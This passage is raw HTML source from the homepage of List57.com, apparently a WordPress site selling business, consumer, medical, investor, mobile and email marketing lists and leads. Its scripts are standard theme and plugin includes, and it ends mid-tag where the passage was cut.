href='http://www.list57.com/wp-content/themes/divi-child/js/jquery-ui.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='divi-fonts-css' href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='divi-style-css' href='http://www.list57.com/wp-content/themes/divi-child/style.css?ver=3.21' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='http://www.list57.com/wp-includes/css/dashicons.min.css?ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='http://www.list57.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.list57.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.list57.com/wp-content/themes/divi-child/js/jquery-ui.js?ver=5.1.1'></script> <link rel='https://api.w.org/' href='http://www.list57.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.list57.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.list57.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='http://www.list57.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.list57.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.list57.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.list57.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.list57.com%2F&#038;format=xml" /> <link type="text/css" rel="stylesheet" href="http://www.list57.com/wp-content/plugins/my-live-chat-for-wp/plugin_files/css/mylivechat.css" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><script type="text/javascript" src="http://www.list57.com/wp-content/plugins/si-captcha-for-wordpress/captcha/si_captcha.js?ver=1558021289"></script> <!-- begin SI CAPTCHA Anti-Spam - login/register form style --> <style type="text/css"> .si_captcha_small { width:175px; height:45px; padding-top:10px; padding-bottom:10px; } .si_captcha_large { width:250px; height:60px; padding-top:10px; padding-bottom:10px; } img#si_image_com { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_reg { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_log { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_side_login { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_checkout { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_jetpack { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_bbpress_topic { border-style:none; margin:0; padding-right:5px; float:left; } .si_captcha_refresh { border-style:none; margin:0; vertical-align:bottom; } div#si_captcha_input { display:block; padding-top:15px; padding-bottom:5px; } label#si_captcha_code_label { margin:0; } input#si_captcha_code_input { width:65px; } p#si_captcha_code_p { clear: left; padding-top:10px; } .si-captcha-jetpack-error { color:#DC3232; } </style> <!-- end SI CAPTCHA Anti-Spam - login/register form style --> <style type="text/css">.broken_link, a.broken_link { text-decoration: line-through; }</style><link rel="icon" href="http://www.list57.com/wp-content/uploads/2018/09/cropped-icon-med-32x32.jpg" sizes="32x32" /> <link rel="icon" href="http://www.list57.com/wp-content/uploads/2018/09/cropped-icon-med-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="http://www.list57.com/wp-content/uploads/2018/09/cropped-icon-med-180x180.jpg" /> <meta name="msapplication-TileImage" content="http://www.list57.com/wp-content/uploads/2018/09/cropped-icon-med-270x270.jpg" /> <link rel="stylesheet" id="et-core-unified-cached-inline-styles" href="http://www.list57.com/wp-content/cache/et/79/et-core-unified-15573402240506.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /></head> <body class="home page-template-default page page-id-79 et_pb_button_helper_class et_fullwidth_secondary_nav et_fixed_nav et_show_nav et_secondary_nav_enabled et_secondary_nav_two_panels et_pb_gutter et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_left et_pb_pagebuilder_layout et_smooth_scroll et_full_width_page et_divi_theme et-db et_minified_js et_minified_css"> <div id="page-container"> <div id="top-header"> <div class="container clearfix"> <div id="et-info"> <span id="et-info-phone">619-678-1000</span> <a href="mailto:[email protected]"><span id="et-info-email">[email protected]</span></a> </div> <!-- #et-info --> <div id="et-secondary-menu"> <ul id="et-secondary-nav" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-79 current_page_item menu-item-has-children menu-item-6407"><a title="Home" href="http://www.list57.com/" aria-current="page">HOME</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2876"><a title="About" href="http://www.list57.com/about/">About</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8178"><a href="http://www.list57.com/request-free-quote/">Request Free Quote</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8628"><a href="http://www.list57.com/buy-sell-trade/">Sell Your List</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6409"><a title="Order" href="http://www.list57.com/order/">Order</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7459"><a href="http://www.list57.com/blog/">Blog</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9251"><a href="http://www.list57.com/terms-conditions/">Terms Conditions</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9765"><a href="http://www.list57.com/privacy/">Privacy</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-8517"><a href="http://www.list57.com/business/">BUSINESS</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6431"><a title="Medical" href="http://www.list57.com/medical/">Medical</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11123"><a href="http://www.list57.com/intl-business/">Non-USA Businesses</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-2901"><a title="Consumers" href="http://www.list57.com/consumer/">CONSUMERS</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8942"><a href="http://www.list57.com/mega/">MEGA HUGE Lists</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11036"><a href="http://www.list57.com/non-usa-consumer/">Non-USA Consumers</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7489"><a href="http://www.list57.com/real-time-leads/">57+ VERTICALS</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8203"><a href="http://www.list57.com/bizopps/">BIZOPPS</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6493"><a title="Investors" href="http://www.list57.com/investors/">INVESTORS</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7194"><a href="http://www.list57.com/mobilecell/">MOBILE</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-10949"><a href="http://www.list57.com/subscription/">SUBSCRIPTION</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10945"><a href="http://www.list57.com/weeklyfeed/">FEED</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10937"><a href="http://www.list57.com/offer/">OFFER</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7203"><a href="http://www.list57.com/services/">SERVICES</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9992"><a href="http://www.list57.com/custom-exclusive/">Custom Exclusive Leads</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7205"><a href="http://www.list57.com/services/email-marketing/">Email Broadcasting</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10603"><a href="http://www.list57.com/services/email-verification/">Email Verification</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8851"><a href="http://www.list57.com/transfers/">Live Call Transfers</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10164"><a href="http://www.list57.com/services/voice-messaging/">Mobile Cell Voice Messaging</a></li> </ul> </li> </ul> </div> <!-- #et-secondary-menu --> </div> <!-- .container --> </div> <!-- #top-header --> <header id="main-header" data-height-onload="66"> <div class="container clearfix et_menu_container"> <div class="logo_container"> <span class="logo_helper"></span> <a href="http://www.list57.com/"> <img src="http://www.list57.com/wp-content/uploads/2017/01/Logo201.jpg" alt="List57.com" id="logo" data-height-percentage="54" /> </a> </div> <div id="et-top-navigation" data-height="66" data-fixed-height="40"> <nav id="top-menu-nav"> <ul id="top-menu" class="nav"><li id="menu-item-9831" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-79 current_page_item menu-item-has-children menu-item-9831"><a href="http://www.list57.com/" aria-current="page">Home</a> <ul class="sub-menu"> <li id="menu-item-6191" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6191"><a href="http://www.list57.com/about/">About</a></li> <li id="menu-item-6226" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6226"><a href="http://www.list57.com/affiliates/">Affiliates</a></li> <li id="menu-item-7461" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7461"><a href="http://www.list57.com/blog/">Blog</a></li> <li id="menu-item-6194" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6194"><a href="http://www.list57.com/join/">Newsletter</a></li> <li id="menu-item-6955" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6955"><a href="http://www.list57.com/sitemap/">Sitemap</a></li> </ul> </li> <li id="menu-item-10689" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10689"><a href="http://www.list57.com/consulting/">Consulting</a></li> <li id="menu-item-8549" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8549"><a href="http://www.list57.com/contact/">Contact</a></li> <li id="menu-item-6193" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6193"><a href="http://www.list57.com/order/">Order</a></li> <li id="menu-item-9849" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9849"><a href="http://eepurl.com/de8aML">Get-Quote</a></li> </ul> </nav> <div id="et_top_search"> <span id="et_search_icon"></span> </div> <div id="et_mobile_nav_menu"> <div class="mobile_nav closed"> <span class="select_page">Select Page</span> <span class="mobile_menu_bar mobile_menu_bar_toggle"></span> </div> </div> </div> <!-- #et-top-navigation --> </div> <!-- .container --> <div class="et_search_outer"> <div class="container et_search_form_container"> <form role="search" method="get" class="et-search-form" action="http://www.list57.com/"> <input type="search" class="et-search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </form> <span class="et_close_search_field"></span> </div> </div> </header> <!-- #main-header --> <div id="et-main-area"> <div id="main-content"> <article id="post-79" class="post-79 page type-page status-publish hentry"> <div class="entry-content"> <div id="et-boc" class="et-boc"> <div class="et_builder_inner_content et_pb_gutters3"> <div class="et_pb_section et_pb_section_0 et_pb_fullwidth_section et_section_regular"> <section class="et_pb_module et_pb_fullwidth_header et_pb_fullwidth_header_0 et_pb_section_parallax et_pb_bg_layout_dark et_pb_text_align_left et_pb_fullscreen"> <span class="et_parallax_bg et_pb_parallax_css" style="background-image: url(http://www.list57.com/wp-content/uploads/2016/07/Targeted.marketing.lists_.leads_.databases.TheListWiz.NET_.jpg);" ></span> <div class="et_pb_fullwidth_header_container left"> <div class="header-content-container center"> <div class="header-content"> <div class="et_pb_header_content_wrapper"></div> <a class="et_pb_button et_pb_more_button et_pb_button_one" href="#grow-your-business">Targeted Marketing Starts Here</a> </div> </div> </div> <div class="et_pb_fullwidth_header_overlay"></div> <div class="et_pb_fullwidth_header_scroll"><a href="#"><span class="scroll-down et-pb-icon">;</span></a></div> </section><section id="grow-your-business" class="et_pb_module et_pb_fullwidth_header et_pb_fullwidth_header_1 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_fullwidth_header_container left"> <div class="header-content-container center"> <div class="header-content"> <div class="et_pb_header_content_wrapper"><h1 style="text-align: center;">Grow Your Business Quickly With Our Targeted<br /> Marketing Lists, Leads and Databases</h1></div> </div> </div> </div> <div class="et_pb_fullwidth_header_overlay"></div> <div class="et_pb_fullwidth_header_scroll"></div> </section> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_1 et_section_regular"> <div class="et_pb_row et_pb_row_0"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_image et_pb_image_0 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/business/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/business.list_.leads_.database.400h.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Investor lists and Business Marketing Lists – Phone, Mail, Email and Fax Leads" href="http://list57.com/business/">Business Marketing Lists, Leads and Databases</a></strong></span></h1> <p><span style="color: #000000;">Our <strong>Business Marketing Lists</strong> receive a thorough enhancement process. They are updated monthly to ensure deliver-ability and accuracy.</span></p> <p><span style="color: #000000;"><strong>Phone Data Choose</strong> Mobile Cell Phones and/or landlines. Advanced filters such as number of locations, number of employees, annual revenue, etc.  &#8211; over 14 million business records.</span></p> <h3 style="text-align: center;"><span style="color: #000000;"><strong>Our Lists Contain Your Future Clients!</strong></span></h3> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_0 more-button et_hover_enabled et_pb_bg_layout_light" href="http://list57.com/business/">BUSINESSES LISTS</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_1"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_2"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Consumer Marketing Lists – Phone, Postal and Email Leads" href="http://list57.com/consumer/">Consumer Marketing Lists, Leads and Databases</a></strong></span></h1> <p><span style="color: #000000;">We access comprehensive multi-sourced <strong>consumer marketing lists</strong> with targeted data obtained from major credit reporting agencies, public records and responder feedback.</span></p> <p style="text-align: left;"><span style="color: #000000;">Phone data of Mobile Cell Phones and/or landlines, and Email and Postal Consumer Database of over 250 million USA consumers and over 100 million homeowners.</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_1_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_1 more-button et_hover_enabled et_pb_bg_layout_light" href="http://list57.com/consumer/">CONSUMER LISTS</a> </div><div class="et_pb_module et_pb_text et_pb_text_2 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p><span style="color: #000000;">Choose <strong>demographic filters</strong> such as ethnicity, age, location, consumer behavior or advanced filters: investments, net worth, income, home value, and lifestyle selects&#8230;</span></p> <p><span style="color: #000000;"><strong>Or get fresh data feeds for over 57 consumer verticals here</strong></span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_2_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_2 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/real-time-leads/">57 VERTICALS</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_image et_pb_image_1 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/consumer/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/consumer.leads_.database.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_3"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_1 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_4"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_2 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/real-time-leads/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/real-time-leads-250.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_3 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Investor lists and Business Marketing Lists – Phone, Mail, Email and Fax Leads" href="http://list57.com/business/">Real-Time Marketing Lists, Leads, Databases of Targeted Consumers</a></strong></span></h1> <p style="text-align: left;"><span style="color: #000000;"><strong>Like a high stakes race</strong>, online marketing is becoming a place where a sale can be won by a whisker; a photo finish&nbsp;<strong>where the deal is won by a millisecond (via API Feed), with real-time leads of prospects.</strong></span></p> <h3><span style="color: #000000;"><strong>List57.com is The Leader in Real Time, Targeted Consumer Leads!</strong></span></h3> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_3_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_3 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/real-time-leads/">REAL TIME LEADS</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_5"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_2 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_6"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_3 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/mobilecell/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/mobile.cell_.phone_.leads_.250.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_4 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Internet Leads – Buy Guaranteed Accurate Email Marketing Lists" href="http://www.list57.com/mobilecell/">Mobile/Cell Phone Marketing Lists, Leads and Databases</a></strong></span></h1> <p><span style="color: #000000;">Cell phone marketing is clearly the trend of the future.&nbsp; Along with it comes the change in how we market our products and services. We are here to help you with the products and services that you need to grow your business in these changing times.</span></p> <p><span style="color: #000000;">List57.com is the leader in custom mobile/cell phone lists and marketing. Are you looking to buy a list of cell phone numbers at the right price? You&#8217;ve come to the right place!</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_4_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_4 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/mobilecell/">MOBILE OPT-IN LISTS</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_7"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_11 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_3 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_8"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_12 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_5 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Private, Accredited Investors, High Net Worth Wealthy Individuals List For Sale" href="investors/">Private Accredited Investors: High Net Worth &#8211; Wealthy Individuals Lists, Leads and Databases For Sale</a></strong></span></h1> <p><span style="color: #000000;">Some of the categories of Investor lists that we have are: Entertainment, Gaming, Green Energy, Oil/Gas, Precious Metals, Private Placement, Surveys, Hi-Tech, Gold and Silver Buyers, Commodities Accounts, Forex Accounts, Newly Opened Stock Accounts, Overseas, Yacht and Aircraft Owners, Sports Players and Celebrities, Palm Beach Locals, Home Owners, Gunn Allen Clients, Whales (uber wealty), Billionaires, Farmers. These are mostly all Accredited Investors, ready to take your call and fund your deal NOW.</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_5_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_5 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/investors/">INVESTORS LISTS</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_13 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_4 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/investors/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/Accredited_Investors_Wealthy_Airplane_owners.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_9"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_14 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_4 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_10"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_15 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_5 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/bizopp/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/Business-Opportunity-Buyers-The-Best-Kind-Of-BizOpp-Seeker-List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_16 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_6 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="BizOpps Business Opportunity Seekers Multiple Lists Available World Wide" href="bizopps/">BizOpps Business Opportunity Seekers and Buyers Marketing Lists, Leads and databases</a></strong></span></h1> <p><span style="color: #000000;"><strong>The second specialty of List57 is our extensive BizOpps Lists.</strong> This is how we started in the list business back in 1997 and we remain true to our roots.  The BizOpp files we currently maintain are  Mobile-Cell Phone Optins, BizOpp Buyers, Business Opportunity Seekers, Double Opt-In, Survey Leads, Australian, Canadian and UK BizOpp Seekers, MLM Genealogy Leads, Bulk Email Leads, Co-Reg Leads.</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_6_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_6 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/bizopps/">BIZOPPS LISTS</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_11"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_17 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_5 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_12"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_18 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_7 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Medical Lists" href="http://www.list57.com/medical/">Medical Marketing Lists, Leads and Databases</a></strong></span></h1> <p><span style="color: #000000;"><strong>Our Medical Marketing Lists Including Email, Phone and Postal Address</strong>. We have a large variety of files to choose from&#8230;all with verified email addresses. They include: Physicians, Doctors, Surgeons, Dentists, Canadian Physicians, Doctors, Canadian Dentists, Nurses, Nurse Practitioners, Physician Assistants, Pharmacists, Chiropractors,Veterinarians, Manufacturing Pharmaceutical, Manufacturing Medical, Electromedical, Dental, Ophthalmic Instrument Executives, Wholesale Trade Medical, Hospital, Scientific, Ophthalmic Goods Executives, Wholesale Trade Drugs, Proprietaries and Sundries Executives, Retail Trade Pharmacy, Drug stores and Proprietary Stores Executives, Hospital Executives General Medical and Surgical Hospitals Executives, Hospital Executives Psychiatric Hospitals Executives, Hospital Executives Specialty hospitals (except psychiatric) Executives, Medical Laboratories Executives, Specialty Outpatient Clinics Executives, Biotechnology Industry Executives, Nursing Homes, Skilled Nursing Care Facilities and Personal Care Executives.</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_7_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_7 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/medical/">MEDICAL LISTS</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_19 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_6 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/medical/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/Physicians-Doctors-Medical-Professionals-Leads-List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_13"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_20 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_6 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_14"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_21 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_7 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://www.list57.com/internet-leads/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/Optin.Bulk_.Email_.Leads_.Fresh_.Real_.Time_.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_22 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_8 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Email List – Marketing With Email Lists" href="http://www.list57.com/internet-leads/">Targeted Categories of&nbsp;Email Marketing Lists, Leads and Databases</a></strong></span></h1> <p><span style="color: #000000;">The categories we have available are: Book and eBook Lovers, Business Opportunity Seekers, College Students, Computer and Tech Savvy, Consumer Internet Leads General Opt-Ins, Christian Men and Women, Credit and Loan Inquiry Leads, Dating and Romance, Debt Inquiry’s, Discount Seekers, Entertainment (General), Financial Products Buyers (Stocks, Forex, Small Cap), Fitness and Personal Training, Gamblers and Betting, Income Targeted (High Income), Insurance Inquiries, Job Seekers, Health and Nutrition, Home Owners, Mortgage Loans and Refinance, Music (general music lovers), Online Shoppers, PayDay Loans Leads, Religion (General Religion), Social Networking Site Members, Sports Enthusiasts, Travel and Vacation Planning, Weight Loss.</span></p> <h4><strong><span style="color: #000000;">Our opt-in email lists often include options such as gender, geography, age, lifestyle, ethnicity, financial status and family size</span></strong></h4> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_8_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_8 more-button 